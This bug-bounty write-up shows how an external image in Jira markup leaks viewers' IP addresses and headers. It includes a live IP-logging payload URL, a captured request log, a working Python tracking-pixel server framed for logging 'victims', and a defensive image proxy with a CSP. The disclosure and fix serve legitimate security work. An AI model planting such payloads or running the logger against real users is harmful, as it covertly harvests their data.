Sergey Kashatov
Apr 24, 2019 · 3 min read

Hello, my name is Sergey, and I do security research and hunt for bugs.

Now I want to tell you about a vulnerability that few people know about, and for which you can earn good money.

I call it the "pixel that steals your data" (it sounds funny).

With this vulnerability I was able to earn good money; here are my reports with this bug.

[Screenshots of the four accepted reports are not reproduced here.]

So what is the vulnerability?

1. Almost every site has forms that accept user-supplied content: comments, biographies, messages, and so on.

For example, take Jira.

I inserted a picture using Jira's wiki markup: "!test.jpg|thumbnail!" (this is Jira's own markup, not Markdown).

Let's try embedding an image hosted on another server (the Jira UI itself does not offer this as a feature, but the markup accepts a full URL).

Now I set up an IP-logging URL on my own site:

!https://site.one/hl/1556067225_d83d0cccc5e87cbe5c!

A request arrived on my server instantly:

GET from 46.158.xxx.xxx

Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br
Referer: https://jira.site.ru/projects/PART/issues/PART-97?fi..
Accept: image/webp,image/apng,image/*,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: keep-alive
Host: site.one
Content-Length:
Content-Type:

Now, if we post this comment with the image loaded from my site, everyone who views the issue will send me their data: each viewer's browser fetches the image and, exactly as above, hands over their IP address, User-Agent, Accept-Language and the Referer that reveals which issue they were reading.

To create such a picture, you can use this service:

https://iplogger.org/
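If you would rather not hand your victims' traffic to a third-party service, the endpoint is trivial to self-host. The following is an added example, not code from the original post or from iplogger.org: a tracking-pixel server that answers every fetch with a 1x1 GIF and records what the fetch reveals about the viewer (IP, User-Agent, Accept-Language, Referer), which is the same data shown in the request above. The simulate_view function is a constructed stand-in for a victim's browser rendering the comment; the Jira URL in it is made up.

```python
# Added example (not from the original post): a self-hosted tracking pixel
# that does what an IP-logger service does. Every viewer's browser fetches
# the image, so the server sees their IP, User-Agent, Accept-Language and
# the Referer (which reveals the Jira issue they were looking at).
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.request import Request, urlopen

# Smallest valid 1x1 transparent GIF; viewers see nothing in the comment.
PIXEL_GIF = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
    b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00"
    b"\x02\x02D\x01\x00;"
)

LOGGED_HEADERS = ("Referer", "User-Agent", "Accept-Language", "X-Forwarded-For")


class PixelHandler(BaseHTTPRequestHandler):
    """Serves the pixel and records what the fetch reveals about the viewer."""

    def do_GET(self):
        record = {"ip": self.client_address[0], "path": self.path}
        for name in LOGGED_HEADERS:
            record[name] = self.headers.get(name)  # None if the browser omitted it
        self.server.hits.append(record)
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(PIXEL_GIF)))
        # Defeat caching so every repeat view is logged again.
        self.send_header("Cache-Control", "no-store")
        self.end_headers()
        self.wfile.write(PIXEL_GIF)

    def log_message(self, fmt, *args):  # keep the stdlib access log quiet
        pass


def start_logger(host="127.0.0.1", port=0):
    """Start the pixel server in a background thread and return it.
    port=0 lets the OS pick a free port; server.server_address has the real one."""
    server = ThreadingHTTPServer((host, port), PixelHandler)
    server.hits = []  # one dict per logged viewer
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def simulate_view(server, referer, user_agent="Mozilla/5.0", lang="ru-RU,ru;q=0.9"):
    """Constructed stand-in for a victim's browser rendering the comment:
    fetch the pixel with the headers a real browser would send.
    Returns (status, body) so the result can be checked."""
    host, port = server.server_address
    req = Request(f"http://{host}:{port}/hl/pixel.gif", headers={
        "Referer": referer, "User-Agent": user_agent, "Accept-Language": lang,
    })
    with urlopen(req, timeout=5) as resp:
        return resp.status, resp.read()


if __name__ == "__main__":
    srv = start_logger()
    # Made-up issue URL standing in for the Referer a real Jira viewer would send.
    simulate_view(srv, "https://jira.example.com/browse/PART-97")
    for hit in srv.hits:
        print(hit)
    srv.shutdown()
```

In real use the server would sit behind the URL you paste into the comment; the Referer header alone tells you which issue or chat each viewer opened, which is why a payload in a busy thread logs so many people.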

Many developers do not think about such trifles. You can fix this in different ways, but in my opinion it would be better to proxy all objects from third-party resources through your own server and to set a Content Security Policy. With a CSP such as img-src 'self' the viewer's browser refuses to load the remote image at all, and with a proxy the fetch originates from your server, so the viewer's IP address and headers never reach the attacker's host.
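Here is what that fix looks like in code. This is an added example, not code from the original post or from Atlassian: it rewrites every external image in Jira-style "!url|options!" markup through a camo-style signed proxy (the approach GitHub uses for images in READMEs), gives the proxy a check so it only fetches URLs it signed itself, and emits the matching CSP. The proxy hostname, the trusted host list and the secret are assumptions for illustration.

```python
# Added example (not from the original post): camo-style image proxying plus a
# CSP, which together stop user-supplied images from leaking viewer data.
# Hostnames, the secret and the proxy path are assumptions for illustration.
import hashlib
import hmac
import re
from urllib.parse import urlparse

PROXY_SECRET = b"rotate-me-in-production"       # assumption: server-side secret
PROXY_BASE = "https://img-proxy.example.com/"   # assumption: our own image proxy
TRUSTED_HOSTS = {"jira.example.com"}            # images already served by us

# Jira wiki-markup image: !target! or !target|thumbnail! (the syntax of the payload above).
IMAGE_RE = re.compile(r"!([^!|\s]+)(\|[^!]*)?!")


def proxy_url(remote):
    """Signed proxy URL for a remote image: the viewer's browser only ever talks
    to our proxy, and the proxy fetches the image server-side."""
    digest = hmac.new(PROXY_SECRET, remote.encode(), hashlib.sha256).hexdigest()
    return f"{PROXY_BASE}{digest}/{remote.encode().hex()}"


def verify_proxy_path(digest, hexurl):
    """Proxy side: return the remote URL only if we signed it, else None.
    Without this check the proxy would be an open relay to any host."""
    remote = bytes.fromhex(hexurl).decode()
    expected = hmac.new(PROXY_SECRET, remote.encode(), hashlib.sha256).hexdigest()
    return remote if hmac.compare_digest(digest, expected) else None


def rewrite_images(markup):
    """Rewrite every external image reference in Jira-style markup through the proxy.
    Attachment names (no scheme) and trusted hosts are left untouched."""
    def repl(m):
        target, opts = m.group(1), m.group(2) or ""
        parsed = urlparse(target)
        if parsed.scheme in ("http", "https") and parsed.hostname not in TRUSTED_HOSTS:
            return f"!{proxy_url(target)}{opts}!"
        return m.group(0)
    return IMAGE_RE.sub(repl, markup)


def csp_header():
    """Content-Security-Policy value: the browser refuses image loads from
    anywhere but our origin and the proxy, even if a rewrite is ever missed."""
    return f"default-src 'self'; img-src 'self' {PROXY_BASE.rstrip('/')}"


if __name__ == "__main__":
    comment = "!https://site.one/hl/1556067225_d83d0cccc5e87cbe5c! and !test.jpg|thumbnail!"
    print(rewrite_images(comment))
    print("Content-Security-Policy:", csp_header())
```

Apply the rewrite when the comment is rendered (not only when it is saved, so old comments are covered too) and send the CSP on every page; the two measures are independent, so a gap in one does not reopen the leak.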

Bug bounty programs will only accept this bug if you can easily steal user data with it. For example, if you find it in chat messages (where people communicate), you can collect the IP addresses of your interlocutors in large quantities, and then it will be accepted.

Attention! Each site has its own markup; I used a payload specific to Atlassian Jira!

HackerOne: https://hackerone.com/iframe

Twitter: https://twitter.com/iframe0x01 Happy hunting!
